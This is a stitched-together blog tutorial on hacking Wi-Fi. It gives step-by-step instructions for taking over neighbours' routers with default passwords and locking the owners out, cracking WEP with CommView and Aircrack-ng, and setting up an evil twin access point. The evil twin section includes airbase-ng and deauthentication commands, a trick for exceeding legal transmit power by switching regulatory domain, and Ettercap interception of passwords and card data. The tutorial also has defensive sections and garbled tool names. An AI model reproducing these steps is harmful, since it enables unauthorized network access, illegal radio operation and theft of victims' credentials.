Hacking for Free Internet (Wi-Fi)
One of the most common targets of criminal hackers is internet connections (wi-fi). When you think about it, free internet access allows criminal hackers to not only get free bandwidth but to also conceal their location and identity.
What happens when your internet connection gets hacked? Your connection not only slows down, but your identity and location also get used for any illegal activity that a criminal hacker may do using your network.
At the same time, it also becomes very possible for a criminal hacker to get deeper access to your personal computer, thanks to discovered vulnerable ports and shared network devices such as printers. If your mobile phone is also synced to your computer, there is a risk that a criminal hacker would also get access to that device.
For this reason, it is very important to know how your internet connection can be hacked. In this blog, you will learn how most criminal hackers opt to crack your Internet connection through the most popular hack tools.
Check for Unchanged Router Passwords
This is probably the easiest way to hack an Internet connection. All you need to do is to see all the available networks that you can connect to. To do that, switch on your computer’s WiFi and look at the list of available networks in your vicinity.
Now, you would see that there are common router names in the list of available networks, such as Linksys.
There is a big chance that the default password for these routers is unchanged, so all you need to do is to log in the manufacturer’s given password.
How do you do that? You just need to go to the manufacturer’s website and look up for the router’s manual.
If you are able to go into the target network using the default password, pull up a fresh browser and log in into the GUI of the target router. If your target is a Linksys router, the IP address to show its GUI is 192.168.1.1.
Once you are prompted for login credentials, leave the username blank, and type in “admin” for a password. (Note: Some routers have different default login credentials depending on the model. You can check for these on the manufacturer’s website.)
Once you are in the GUI, you can change the SSID, the router password, and the security protocol of your target router. This way, you would be able to take full control of the router and prevent the network owner from connecting to his own ISP!
This method assumes that there are just too many Internet users that are not too careful when it comes to securing their Internet connection before putting it to use.
You would be surprised that there are people who do not even bother changing the SSID of their Wi-Fi, which is almost a giveaway that it is not secured by a password other than what the manufacturer uses.
Hack Internet Password
What would hackers do when the Wi-Fi that they are trying to hack is secured? The next thing that they would do is to check how possible it is to guess what the password of their targeted network is.
At this point, you would need to learn a few key terms when it comes to identifying and assigning security to Wi-Fi connections:
1.WEP – means Wired Equivalent Privacy. This is the most basic form of Internet encryption, thus an unsafe option for most Internet users when it comes to assigning security to their wireless connection.
This type of encryption can be cracked with ease using the most basic hacking tools. Older models of Wi-Fi still use this type of encryption.
2.WPA – means Wi-Fi Protected Access. This is a more secure option for newer computer and router models, which can only be efficiently cracked through the old-fashioned trial-and-error method of guessing a potential letter or word combinations (also known as dictionary attacks).
If a strong password combination is used, a WPA connection may almost be impossible to crack. Another variation of this security protocol is the WPA-2, which is tougher to penetrate.
At this point, you have the idea that most hackers would opt to hack available networks that are protected through WEP protocol since it is faster and much easier to crack. Here is a list of tools that a hacker needs in order to crack a WEP-protected Internet connection:
1.A wireless adapter – you would need to have a wireless adapter that is compatible with software called CommView. This software allows your wireless card to enter monitor mode.
To see if your wireless card is compatible with CommView, you can head over at Wired and Wireless Network Analysis Software by TamoSoft and see if your adapter is on the list.
2.CommView – CommView for Wifi is a software that is used to capture packets from your target network. All you need to do is install this software and then follow the installation guide to install its drivers for your wireless card.
3.Aircrack-ng GUI – this software enables you to crack the password of your target network after you are done capturing packets.
Follow the steps below to start cracking a WEP-encrypted network:
1.Run CommView for Wifi to start scanning for wireless networks according to the channel. Leave it running for a few minutes. You would then see a long list of networks that your wireless adapter can reach.
2. Choose a WEP network (you would see this right next to the name of networks on the list.) Select a network that has the lowest decibel (dB) rating and has the highest signal.
3. Once you have chosen your target, right-click it to open a context menu. Click on Copy MAC Address.
4. Head over to the Rules tab on the menu bar and select MAC Addresses. Tick on the MAC Address rules.
5. For the Action option, choose CAPTURE. Afterward, head over to the Add Record option and choose BOTH.
6. Once you are done formatting the rules, paste the mac addresses that you copied on your clipboard to the box that you would find below it.
7. When capturing packets, remember that you would only need to capture the ones that you would be used for cracking. To make sure that you only capture the packets that you need, select option D (which you would find on the bar right above the window) and deselect Management Packets and Control Packets.
8. Make sure that you save the packets that you have captured so that you can crack them for later. Go to the Logging tab on the menu bar and enable Auto Saving. Afterward, set the Average Log File Size to 20 and the Maximum Directory Size to 2000.
9. Now, wait until you capture enough data packets. Make sure that you wait until you have at least 100,000 data packets so you can get a decent signal for cracking.
10.After collecting enough data packets, head over to the Log tab and select all the logs that have been saved during capture. Head over to the folder where your saved logs are stored.
Click on File, and then Export, and select Wireshark tcpdump format to save it as a .cap file. Choose any destination that you would easily access later on. Do not close CommView.
11. Now, you are ready to crack. Run the Aircrack-ng GUI and choose the WEP option. You would be prompted to open the .cap file that you have exported a while ago. Once you retrieve that file, select Launch.
12. Once your Aircrack-ng GUI is running and decrypting the data packets that you had on your log, open the command prompt. Type in the index number of the network that you have selected a while ago.
13. Wait until the wireless key appears.
If everything goes well, you would easily get the wireless key of your targeted network. If you missed some packets, you would be prompted by Aircrack-ng that you need to capture more of them. If that happens, you just need to wait for CommView to get the additional packets that you need.
Can Tougher Security Measures be Breached?
At this point, you would realize that it is fairly easy for most hackers to gain access to the type of Internet security that you are using.
At the same time, you should also have the idea that once criminal hackers know what type of encryption you are using, the easier it is for them to identify the tools that they should use for hacking your network.
Is it possible for hackers to breach more advanced protocols such as WPA and WPA2?
Yes, they could accomplish such a feat, but it would take them more time – making the process inefficient, especially given that their goal for hacking network connections is to enjoy better bandwidth and have immediate internet access or even to mask their location.
For this reason, it would be best to enable WPA (or other better encryption options) should your devices allow it.
Now that you have a general idea on how hackers can steal your Wi-Fi, it is time to take some preventive measures. The next blog will tell you more about that.
Securing Your Network
It is possible for Internet connections to get stolen, but there are many ways to dissuade hackers from getting their hands on your bandwidth. If you think that someone is leeching on your Wi-Fi, it pays to check the users that are connected to your network.
Tell-Tale Signs of Breach
You can almost be certain that an unauthorized user is connected to your network if you experience the following:
1. You are experiencing intermittent Internet connection
If you are sure that you usually have a high-speed Internet connection and that you normally do not have problems when streaming or viewing pages, it is very possible that an extra user is logged in to your Wi-Fi.
2. You see changes in your Public folder
If you are the sole user of Internet in your household, or that you are very certain of what the contents of your network’s shared folders are, then there should be no reason for you to see any new or altered files on your Public folders.
The best way to check that is to pull down the context menu of any suspected files and see when they were last accessed or modified. If you do not remember accessing them on the displayed date and time, then somebody else is accessing them without your knowledge.
3.Your shared devices are behaving strangely
If your printer and other gadgets that can be accessed through the network are behaving strangely, or there are unknown devices that are suddenly included in your network, then somebody else must be using your network for remote access.
4. Your router’s lights keep on blinking even when you are offline
One of the low-tech ways to see whether there is an unauthorized Wi-Fi user on your network is to disable the connection on all your wireless devices. If your router’s wireless lights are blinking, then there is another user that is making use of your internet connection.
5. You have an unidentified user on your network’s console
You can see all the devices and their corresponding MAC addresses on your network’s admin console. All you need to do is to enter your router’s assigned IP address on your browser, enter your login credentials, and then check all the attached devices.
If there is an unrecognizable device on that list, then you are definitely certain that someone is snooping around on your wireless connection.
Beef Up Your Security and Auditing Measures
If you confirmed your suspicion that there is someone leeching on your Internet connection, the best way to prevent them from getting access is to change your router’s password and SSID immediately.
This way, the unauthorized user would be immediately kicked out of your network. To take things further, you may also opt to disable SSID broadcast so that your Internet connection would not be detected as an available network anymore.
However, this solution may be temporary if you are against a sophisticated hacker. Keep in mind that it is possible for some hackers to mask their MAC address through MAC spoofing, which means that their device may not appear on the list of attached devices when you check your router’s GUI.
When this happens, you may want to use more sophisticated tools for auditing connected devices on your network to check for any sleuthing activities. Here are some tools that you can use to make sure that you identify all unauthorized users on your network and prevent them from connecting to your router once and for all:
GlassWire serves as both a security system and a firewall. If you subscribe to the Pro version, you would gain access to the Network view that would enable you to see all the devices connected to your network.
You can also get a full report on how your bandwidth is being used, which includes a detailed graph of what running applications are using up bandwidth.
It would also alert you whenever there is an application that is trying to apply changes on your computer, or when an installer is trying to add a driver to your system.
What makes it a good security feature to your computer is that it would always alert you when there is a new device that connects to your wireless connection. If you are running a network of computers, this feature would be a most welcome addition to your security protocol.
2.Wireless Network Watcher by Nirsoft
This software is a clean program that works without any nag popup screen or adware, and for those who are trying to save up space, this tool does not even need to be installed.
All you need to do is to download the tool and launch it, and then it would start displaying all devices, MAC addresses, and Wi-Fi network hardware of all connected devices. This tool even allows you to identify devices that do not come with a specific device name, like Android devices.
This free wireless auditing tool is among the favorites of law enforcement organizations since it can tell you the location of any wireless hacker based on the information that they send across the network. It is fairly accurate in pinpointing locations up to two meters.
It does not run as an executable Windows file, so you would need to burn this file into a bootable CD. To use this program effectively, you would want to use a wireless card with a directional antenna, and then walk around with your laptop to triangulate and pinpoint the physical location of a wireless hacker.
Dealing with Fake Wi-Fis
If you are on the go and you need to send a quick email, it would be fairly tempting to log-in to any available wireless network that seems to be unprotected by a password. Now, wouldn’t you think that it is just too convenient that an unprotected WLAN is available?
Hackers have what it takes for people to take the bait of a free Wi-Fi – it is because people do not think twice before connecting to an available hotspot in a public place.
Because hackers know that most people are not thinking about their devices’ safety when there is free internet access on the line, they are confident that people would fall for their trap.
Fake Wireless Access Point Theft
This hacking technique, also known as the evil twin access point, is mostly done in public areas, wherein a hacker would mask an access point as free internet connection and prompt people to connect to it. Once a victim connects to the fake wireless connection, they would be able to collect sensitive data from the connected device.
Usually, hackers who use this technique prompt the user to log in using any sensitive information (such as credit card information) in exchange for free access.
While the hacker stores this information for future use, he would redirect the targeted user to other sites that people commonly visit, such as a web browser, email landing page, or even social media sites.
From here on, the hacker would collect password information. Hackers then use the collected data to log in to other sites, assuming that their victims are using the same passwords for multiple sites.
Apart from knowing just the password of a targeted Internet user, an evil twin access point also allows you to see the traffic that comes in and out of a connected device. That means that creating an evil twin access point also allows you to view all the activities of a potential target.
The biggest telltale sign that you have been a victim of this type of hack is when you receive notices from your credit card company about charges that you did not make or that your social media account has been taken over.
However, if you think that you have connected to an evil twin access point, there is no telling what kind of information about your computer usage, or your files, have already been shared to thousands of hacker forums.
How an Evil Twin Access Point is Made
Creating a fake wireless access point would need almost the same tools that you use in hacking a Wi-Fi, which is the wireless card and the aircrack-ng suite.
This suite has a tool called airbase-ng, which can convert your wireless card into an access point. This tool would allow you to see all the traffic coming from a connected device and also enable you to make a man-in-the-middle attack.
The following hack would enable you to clone an existing access point (or your neighbor’s internet connection) and fool a target into connecting to a fake access point.
The objective of this hack is for you to know how a criminal hacker would be able to easily select a target within range, bump him off his own connection, and then force him into connecting to a false duplicate of his WLAN connection.
This would show you how any hacker would be able to monitor his target’s traffic, and also obtain sensitive information.
Here are the steps that you need to take in order to create an evil twin access point:
1. Start Airmon-Ng and check your wireless card. Run the following command: bt > iwconfig.
After doing so, you would be able to see that your wireless card is operational. It would most probably be assigned as wlan0 once it is up and running.
2. Once your wireless card is set, run it into monitor mode.
To do this, simply enter: bt >airmon-ng start wlan0
3. By running the previous command, you would be able to see all the wireless traffic that your wireless card can monitor with its antenna. That means that you would be able to see all the SSIDs of access points that the people around you are connecting to.
Now, you would need to capture this traffic. To do this, enter: bt > airodump-ng mon0
4. In order for you to dupe people into connecting to a fake wireless connection, you would need to clone an existing access point and convert it into an evil twin. Doing so would also allow you to insert your own packets or pieces of data into a target’s computer.
5. Now, all you need to do is to wait for your target computer to connect to his internet connection. When that happens, it would appear on the lower part of the screen.
6. Once your target has connected to his own access point, you would need to create a new access point using the same SSID and MAC Address of his WLAN.
The MAC Address would appear as the BSSID in the list of access points that your wireless card was able to detect during monitor mode. You would also need the channel where your target’s signal is.
Once, you have the information that you need, pull up a new terminal and enter the following command:
bt > airbase-ng -a (BSSID) —essid “(name of the access point)” -c (channel) mon0
7. Now, you would need to take your target off his access point and force him to automatically reconnect to the fake access point that you have created in the previous step.
To do this, you would need to insert a deuth packet using the following command: bt > airplay-ng —deauth 0 -a (BSSID of target)
8. Here is one crucial aspect that hackers are aware of when they are creating an evil twin: the fake access point that you have should be close to the strength or stronger than the signal of the target’s true access point. If you are in a public place, this should not be a problem.
However, if you are targeting devices that are far from you, you would need to turn up your fake access point’s power.
To boost your access point’s signal to its maximum,key in the following command: iwconfig wlan0 txpower 27
Typing in this command would allow you to boost your access point’s output to the maximum allowable power in the United States, which is 500 milliwatts or 27dBm. If your target is too far, you may need to boost your access point’s power up to what your wireless card would allow you to.
Every country has Wi-Fi regulations, and the maximum allowable power for access points in another country may be illegal in yours.
Make sure that when you do the following hack, you would are backed by your company and that you have assumed written prior consent by your practice target to avoid any legal repercussions of the next steps.
If you want to use another country’s maximum regulated power to boost your access point a little further (Bolivia has more available channels and can allow you to boost up to 1000 mW), you can use the following command to switch regulations: iw reg set BO
Once you are in this country’s regulatory domain, you can boost your wireless card to the maximum by typing the following command:iwconfig wlan0 txpower 30
To check for the output power, type: iwconfig
Now, you are guaranteed that all device users that are looking at available networks around you are seeing your access point in its full signal. If you boosted the signal to 30dBm or 1000mWs, your fake access point would possibly be seen even from a few blocks away.
By boosting the signal, hackers are able to create the impression that their fake network is legitimate.
However, there is something you should keep in mind as you boost your wireless equipment’s power – overheating becomes a much greater risk as you move towards the higher output. So, it is recommended to at least consider lowering the device’s temperature, which is usually done by increasing airflow.
9. Now that you have successfully created a fake access point, the next step is to monitor the activity of your targets. You can use the software called Ettercap to start creating man-in-the-middle activities, which means that you can set up shop in this connection by intercepting, injecting traffic, or analyzing all the data that comes and goes into a target device.
Through this activity, you would be able to intercept all possible sensitive information that he may unknowingly pass through the evil twin network, such as passwords, credit card information, downloads, and uploads.
Now that you know how most hackers can set up shop in your devices by duping you into connecting to a fake access point, it’s time to take preventive measures. Here are some ways on how you can prevent attacks like this:
1. Ask for legitimate Wi-Fi service
The best defense against evil twin attacks is to verify what network you are connecting to before you connect. If you are in a public space, such as a café, make sure that you ask for the shop’s SSID and password. If you think that free Wi-Fi is too good to be true, it most probably is.
2. Always use different log-ins.
If there is no choice but to log in to a free public Wi-Fi, then make sure that you are using a different username and password to prevent giving everyone listening to the network a free pass to your most sensitive accounts.
3. Use a Virtual Private Network (VPN)
A VPN masks your device’s physical location by assigning you a different IP address and even a MAC Address.
It would also encrypt the data that you are sending out, which means that all the information that you are using to fill out any form on an evil twin network would not be deciphered by any hacker that would be listening on the other end.
VPNs are also great when it comes to detecting any evil twin network – if a free hotspot is prompting you to disconnect your VPN before you continue, then you know that the hackers on the other end are forcing you to disable any encryption that they can’t read through so that they can steal your data.
4. Be extra cautious when your devices suddenly disconnect from your secured internet, especially when all other devices that are connected to the network are also bumped off. It is very possible that a death packet has just been inserted into your access point, forcing every device connected to it to disconnect.
When this happens, turn off the auto connect feature of your devices to prevent them from connecting to a potential evil twin access point.
5. If you are in an unfamiliar public area, turn off the auto connect to the hotspot feature of your devices.
6. Pay attention to any pop-ups and dialog boxes that tell you that there is another device that connected to your network.
7. Pay extra attention to the URL of the pages that you are connecting to. Most companies do advertise unencrypted versions of their websites, simply because HTTP is easier to remember than https.
Always remember that the added “s” means that you are visiting a secure site. Also, make sure that there is a lock icon on the browser when you are entering sensitive information.
Detecting and Targeting Wireless
In addition to standard wired networks, you will encounter a myriad of wireless networks and devices during your investigations. As such, you must have a strong knowledge of what they are, how they work with them, and how to potentially strike at them during your pen-test.
Wireless technology extends a company’s network into areas that wired networks cannot go (or go easily). Reception for wireless networks can now easily extend into nontraditional areas such as coffee shops, hotels, libraries, public parks, lobbies, shopping malls, and restaurants, to name a few.
This greater range, as well as issues such as access, ease of setup, and unique security and setup requirements, has made wireless a prime target for attacks.
In this section, you’ll learn to:
Break wireless encryption technologies Conduct a wardriving attack
Break the Internet of Things
[Note: You can free download the complete Office 365 and Office 2019 com setup Guide.]
An Introduction to Wireless
Wireless (Wi-Fi) collectively refers to the group of technologies covered by different frequencies and capabilities of wireless networks.
Nowadays nearly every gadget, device, and household appliance contain wireless technology. Wireless may be the only networking technology you find on your new gadget or device, with wired networking optional in many systems.
With all the convenience that the technology offers, the risks have increased, in some cases dramatically, compared to traditional wired networks.
Attacking parties have found wireless networks to be much easier to target and penetrate than wired networks, and many companies have slowed their implementation or needlessly exposed themselves to security risks.
Of course, there are drawbacks to every technology:
The range of wireless networks is not as good as that attained by traditional wired networks.
Interference is common on wireless networks due to the presence of other wireless devices and environmental factors. Interference means lower performance, dropped connections, reduced distance, and other issues. Performance and distance of wireless networks are never what is promised on the device itself and is usually around half of the numbers specified.
Security is a concern on wireless networks because the signal covers a much broader area than a traditional wired network can. Wireless-enabled devices are the norm and users of these devices tend to always look for open access points, in many cases not giving much care to whether or not they are secure.
Geographic and environmental conditions can have a tremendous impact on the range and speed of a network. Changes in air density, trees, walls, temperature, and other conditions will affect wireless networks.
There are many advantages that make wireless a great target of opportunity:
Can go places where wires would be impossible to place and thus easier to access
Available in many places where wired networks do not exist or can’t exist
Extremely common technology
A wireless network relies on radio frequency (RF) to send and receive information, so understanding RF will assist you in working with these networks. Much like Ethernet networks, Wi-Fi networks are concerned with what happens at the physical layer of networking.
The physical layer defines how stations will connect, transmit, receive, and format signals for use on a network, which, in this case, is wireless.
Recognizing the Components of a Wireless Network
Wireless technology has a special language and a set of terminology. Though you may not hear all the terms all the time, familiarity with them is important, so I will introduce you to each and their respective function or place.
Service Set Identifier (SSID) This is the name that is broadcast by a wireless access point that identifies itself to potential clients.
You have already seen an SSID appear in your favorite wireless client as the text string that appears in the list of available wireless networks. The name can be made up of a combination of letters and numbers.
An SSID is used to identify a wireless network to clients. However, wireless networks can have their SSID either visible or hidden depending on the situation. On open networks, the SSID is visible and can be viewed by any client searching for it. On closed networks, the SSID is not visible and in some cases is said to be cloaked.
Association When a wireless access point and a wireless client connect while getting ready to exchange information, it is called an association.
Hotspot This is any location that provides wireless access to an area such as a coffee shop, airport, library, lobby, or similar location.
Access Point This is a hardware device or software application that allows a wireless network to be established. Clients connect to the access point for network services.
When working with the standard access points sold in consumer electronic stores, changing the antenna is not an option. However, where a large and more powerful enterprise access point is involved, the selection of an antenna is much more important.
Let’s take a look at the different types of antennas that you may encounter and what each may mean to you as a security person.
Wi-Fi Authentication Modes
Clients associating with an access point must not only be in range and speaking the language, but they must also perform some sort of authentication. There are two major types:
Open System Authentication (OSA) is used in situations where the access point can be attached to by any client. This type of authentication occurs when an authentication frame is sent from a client to an access point (AP).
When the AP receives the frame it verifies its SSID, and if correct the AP sends a verification frame back to the client, completing the connection sequence.
It is important to remember that just because this process has completed successfully it does not in any way mean that the client will be able to access the network resources. All that has happened is that the client can attach to the access point.
Shared Key Shared key authentication is different from OSA. A client receives a key ahead of time, which allows them to attach to the network.
In a few steps, this is how shared key authentication works:
1. The client sends an authentication request to the access point.
2. The access point returns a challenge to the client.
3. The client encrypts the challenge using the shared key it is configured with.
4. The access point uses the same shared key to decrypt the challenge; if the responses match, then the client is validated and is given access to the network.
Breaking Wireless Encryption Technologies
One of the things that have made wireless networks less than attractive to companies traditionally is their perceived lack of or weak security. Since wireless networks transmit their signals over the air, the information is more vulnerable than it would be on a wired network.
Without adequate protection, the information can be easily sniffed and even captured by a third party. To reduce this problem, encryption is commonly implemented to make the likelihood of interception lower.
The three most common technologies used to protect wireless networks are as follows:
Wired Equivalent Privacy (WEP) The oldest and the weakest of the technologies, the WEP standard was introduced as the initial attempt to provide wireless security but was found to be flawed and highly vulnerable not long after it debuted.
Wi-Fi Protected Access (WPA) The primary successor to WEP, WPA, was intended to address many of the problems that plagued WEP. Though it succeeded in addressing many of the problems and is a much stronger system, it still has some vulnerabilities. WPA uses TKIP and AES encryption as its main mechanism for securing information.
WPA2 This successor to WPA was intended to address and replace the problems with WPA. WPA2 is much stronger and uses tougher encryption in the form of AES and CCMP. The standard also comes in a version that uses stronger systems such as EAP and TKIP. WPA2 also has a Personal as well as an Enterprise method for deployment.
With all the alphabet soup revolving around security protocols, which is the best to use? Which is the most vulnerable? Which is the strongest? Let’s take a look to see what is what with security and wireless.
When wireless networks were first introduced to the public, the need for security was readily obvious and the creators of wireless introduced WEP to provide this ability. WEP is the oldest of the security protocols available for wireless networks and also happens to be the most vulnerable.
When originally introduced with the 802.11b standard, WEP was intended to make wireless networks as secure as wired networks. However, this proved not to be the case as the technology was not up to par.
On the surface, WEP looks like a good technology with its use of well-known and well-regarded cryptographic protocols such as RC4, but in actuality, the implementation was extremely poor.
It is now known that technology is weak at best. WEP was created with good intentions, but when created it was very weak in practice. The reason for this was the simple fact that WEP was created by people not familiar with cryptography who did not enlist the aid of those who were.
So the use of good technologies and techniques such as RC4 that were used during WEP’s creation were not used in an effective way.
WEP was intended to provide the following:
Defeat eavesdropping on communications and attempts to reduce unauthorized disclosure of data
Check the integrity of data as it flows across the network
Use a shared secret key to encrypt packets prior to transmission
Provide confidentiality, access control, and integrity in a lightweight, efficient system
Its problems arise from the following circumstances:
The protocol was designed without input from the academic community.
It provides no mechanism for key distribution and instead relies on preshared keys. This leads to many users never changing their keys due to the amount of work involved.
An attacker gaining enough ciphertext and plaintext can analyze and uncover the key from intercepted network traffic. Undoubtedly, you have heard a lot about how poor the WEP protocol is and how it should not be used. What we are going to explore is how WEP is broken so you can see the process and how everything pulls together.
To perform this process from end to end, including the process of cracking the keys, follow these steps:
1. Start the wireless interface on the attacking system in monitor mode on the specific access point channel. This mode is used to observe packets in the air, but it does not connect to an access point.
2. Probe the target network with the wireless device to determine if packet injection can be performed.
3. Select a tool such as aireplayng to perform a fake authentication with the access point.
4. Start the Wi-Fi sniffing tool to capture Initialization Vectors (IV). If using aireplayng, ARP request packets can be intercepted and reinjected back into the network, causing more packets to be generated and then captured.
5. Run a tool such as Cain & Abel or air racing to extract the encryption keys from the traffic
Moving from WEP to WPA
After WEP was found to be terribly flawed and irreparably broken, Wi-Fi Protected Access (WPA) was introduced. WPA was designed to be a software upgrade instead of requiring a full hardware upgrade, making implementation easy via service packs or software updates.
The most significant development that was introduced with the WPA protocol was the TKIP system to improve data encryption. TKIP is a protocol used to dynamically change keys on a regular basis; WEP, in contrast, uses the same key until it is physically changed. This dynamic changing of keys makes WPA much more difficult to crack than WEP.
WPA does suffer from the following flaws:
Weak keys are chosen by the user Packet spoofing
Cracking WPA and WPA2
To crack WPA, a different approach must be used than with WEP. Fortunately, one of the best tools available for thwarting WPA is freely available in Kali Linux in the form of Reaver. Reaver exploits holes in wireless routers in an attempt to retrieve information about the WPA preshared key that is used to access the network.
WPA2 is an upgrade to WPA, which was introduced to fix the defects that were part of the original. WPA2 offers much-improved security over its predecessor and retains compatibility with 802.11i standards for security.
WPA and WPA2 both suffer from vulnerabilities that can be exploited by you, the pentester. Each offers a way to penetrate the security of an otherwise strong protocol.
So, how can you attack WPA and WPA2?
Offline Attack This attack functions by being close enough to the access point to observe what is known as a handshake between the client and access point. A handshake is an authentication or association that takes place when an initial connection attempt is made.
Since an initial synchronization or key exchange is made at this point, it is a matter of observing and capturing the process and cracking the keys offline. This attack works because the handshake is in the clear each and every time, making it possible to gain enough information to get the key.
Deauthentication Attack This type of attack approaches the problem of observing the handshake process that takes place between the client and AP and inducing them to break their connection and reconnect. Much like the offline attack, the deauthentication attack just has to capture the handshake process and crack the key.
Extracting Keys In situations where preshared keys are entered into each client, it is possible to physically gain access to the client and retrieve the key from there.
Brute-Force WPA Keys The lowest technological attack is to break the keys by using a good old brute force. This attack is typically performed using tools such as aircrack, airplay, or KisMac to brute force the keys.
The downside of this attack is that it can take a long time or a lot of computing power to recover the keys. The attack may also either lock up the access point or set off detection mechanisms.
While carrying out these attacks are possible using Linux-based tools such as Kali Linux or the aircrack-ng suite, other options are available. A company called Pwnie Express has two devices known as the Pwn Pad and the Pwn Phone that make cracking wireless easier than ever before.
Both devices offer a built-in suite of tools used for all sorts of security audits and tests, including tools that can very quickly break WEP, WPA, and WPA2.
Both have the advantage of using off-the-shelf hardware such as the Nexus 5 and Nexus 7, which can make them very easy to hide. They also don’t look overly suspicious when they are observed by a third party. The downside is that they are rather pricey—over a thousand dollars a piece.
Though you can purchase a device such as the Pwn Pad or Pwn Phone, they may not be the best or most cost-effective option. Both the can be homemade just by purchasing the tablet or phone from eBay and using free versions of the OS (called community editions) from Pwnie Express.
You could also build your own device from scratch using the much more popular Kali Linux pentesting OS in the form of Kali NetHunter.
The benefit in this route is that it works on many more devices and is more flexible, much better documented, and highly customizable—as well as being free.
Exploring Wireless Deployment Options
There are numerous ways to deploy a wireless network. As a pentester, you should be aware of these different types since they may be useful to you in planning or carrying out a test. Understanding the various types of network deployments for wireless can greatly assist you when planning your attack.
For example, being able to identify a 4G hotspot may allow you to target a user who is using their phone to establish a wireless connection while attached to a physical network.
In this case, the user may be opening up a backdoor to the main network. Targeting a site-to-site WLAN could effective if you wish to carry out a denial-of-service attack and break connectivity between locations.
One of the common ways to create a wireless network nowadays is through the use of a 3G/4G hotspot. A 3G/4G hotspot is a wireless network that is deployed by using a special cellular-enabled access point or by using a cell phone that can be turned into an access point with a simple “push” of a button.
Encountering these types of devices is common sense just about every smart-phone has this capability as a standard function.
Networks using a cellular access point have another common property: their form factor. Many of the access points that are in this form factor are small and may come in the form of a cell phone or tablet.
These last two illustrate a benefit as well as a security issue with these access points: they don’t look like one and are only part of a very common device. Devices like this can be easily concealed and blend in with the everyday kit someone would carry, thus not raising suspicion.
Extension to an existing network is the type of network deployment that uses access points that are attached to a hardwired network and allow the reach of the existing network to go further. Interestingly enough, the types of access points encountered in this type of network can be hardware or software in nature.
The latter type of access point (the software type) is typically accomplished by sharing a wireless adapter to other devices and thus allowing them to attach to the client.
Multiple access points are another commonly encountered deployment type that uses several access points to cover a large area. Much like cellular networks, this type of deployment requires access points to overlap with each other to some degree, allowing clients to roam without losing connectivity.
This type of deployment is encountered in locations such as hotels, conference centers, and schools and involves providing more than one access point for clients to attach to as needed.
When this type of implementation is in place, it requires that each access point have some degree of overlap with its neighboring access points. When it has been set up correctly, this type of network allows clients to roam from location to location seamlessly without losing connectivity.
A LAN-to-LAN wireless network allows networks in close but different physical locations to be connected through wireless technology.
This has the advantage of allowing connection between locations that may otherwise have to use a more expensive connectivity solution such as paying to dig up a street to lay a physical cable. This type of deployment is also sometimes referred to as a site-to-site wireless LAN (WLAN).
So how can you thwart many of the attacks that we have discussed here that target WEP and WPA? Well, excluding encryption and other mechanisms, some of the leading techniques include the following and are commonly used by the consumer:
Use a complex password or phrase as the key. Using the same rules you saw earlier for passwords, you can make a strong password for the AP. Use server validation on the client side to allow the client to have a positive ID of the AP they are connecting to.
Eliminate WEP and WPA and move to WPA2 where available. Use encryption standards such as CCMP, AES, and TKIP.
Use MAC filtering on the access point.
Disable the option SSID Broadcast in your router. With an understanding of the various security technologies, you now need to know how networks can be found in the first place.
Conducting a Wardriving Attack
Wardriving is a common means of targeting wireless networks. The attack consists of an attacker driving around an area with a computing or mobile device that has both a wireless card and software designed to detect wireless clients or access points.
In this exercise, you will set up and configure a system to perform a wardriving operation. This exercise provides the general steps and items you will need to perform this operation, but you may need to tailor certain steps for your hardware and setup where noted.
A word of caution: Keep safety and the law in mind when performing this exercise. If you choose to actually drive around using this setup, remember that you should first start the system up and get it scanning while you are stopped. You should place the notebook on the floor of the vehicle on the passenger side or back seat of the car.
Additionally, the notebook screen should never be in view of the driver unless the car is safely stopped or parked; having a computer screen in view of the driver is illegal in most states.
Perform this activity with someone else driving while you test it out. Before you start this exercise, you will need the following:
Software such as Vistumbler, KisMAC Mapping software such as WiGLE
Hardware USB GPS device
Notebooks with a wireless card (Note that the frequencies your wireless card supports will be the only ones you will be able to detect; if this is insufficient for your needs, you will need to get an external USB adapter.)
Here are the steps:
1. Install the software of your choice as defined by your operating system.
2. Register for an account on the WiGLE website in order to upload the data that you have collected regarding access points and locations.
3. Ensure that the drivers for your wireless card or adapter are updated to the latest version.
4. Install your GPS device and load the necessary drivers for your operating system.
5. Start up your software (such as Vistumbler).
6. Configure your software to recognize your GPS (if necessary).
7. Let the system run for a few moments to allow it to detect wireless networks. If successful, proceed to the next step. If not, refer to your software or hardware vendor’s website to troubleshoot and test again.
8. Drive around with the system running for a time, with the software detecting access points.
9. After a period of time, you can save a log of the activity to your hard drive.
10. Once the information is saved, you can upload it to WiGLE, which will plot out the locations on a map.
In this type of attack, wireless detection software will either listen for the beacon of a network or send off a probe request designed to detect the network. Once a network is detected, it can then be singled out for later attack by the intruder.
It is common for site survey tools to also include the ability to connect to a GPS device in order to pinpoint an access point or client within a few feet. There are also variations of the wardriving attack, all of which have the same objective:
Warflying Same as wardriving, but using a small plane or ultralight aircraft War ballooning Same but makes use of a balloon instead
Warwalking Involves putting the detection equipment in a backpack or something similar and walking through buildings and other facilities
Something that works with these techniques is known as warchalking, or the placement of symbols in locations where wireless signals were detected. These symbols tell the informed that a wireless access point is nearby and provide data about it, including open or closed access points, security settings, channel, and name.
Conducting Other Types of Attack
These are other ways to get at a wireless network:
Rogue access points are an effective way of breaching a network by tempting users to connect to the access point. To carry out this attack, the attacking party will set up an access point that is outside of the company’s control.
Once victims attach to the access point, they may start to transmit information (including sensitive company data) over the network, potentially compromising security.
This type of attack is very easy to perform through the use of readily available compact hardware access points as well as software-based access points. In both cases, the access points are easy to hide as well as easy to configure.
MAC spoofing uses MAC filtering to control which clients can or cannot attach to an access point. By using software such as a sniffer, you can view the valid MACs that can attach to an access point and duplicate them accordingly. For those access points that employ MAC filtering, you can use MAC spoofing.
Typically it is possible to use tools such as SMAC or ifconfig to accomplish this task. However, in some cases, the hardware configuration settings for a network card may allow the MAC to be changed without such applications.
Misconfiguration is a common problem—many hardware and software items can be misconfigured. The owner of a device could easily misconfigure a device and reduce or negate the device’s security features.
A wireless access point provides an ideal “access anywhere” solution for attackers or other malicious parties that can’t physically connect to the network.
Client misassociation is a type of attack that starts with a victim attaching to an access point that is on a network other than their own. Because of the way wireless signals propagate through walls and many other structures, a client can easily detect another access point and attach to it either accidentally or intentionally.
In either case, a client may attach to a network that is unsafe, perhaps while still connected to a secure network.
A promiscuous client offers a strong signal intentionally for malicious purposes. Wireless cards often look for a stronger signal to connect to a network. In this way, the promiscuous client grabs the attention of the users by sending a strong signal.
Another potential attack is the process of jamming the RF signal being used by a wireless network. Jammers are available that specifically target wireless networks in both the 5 GHz and 2.4 GHz range.
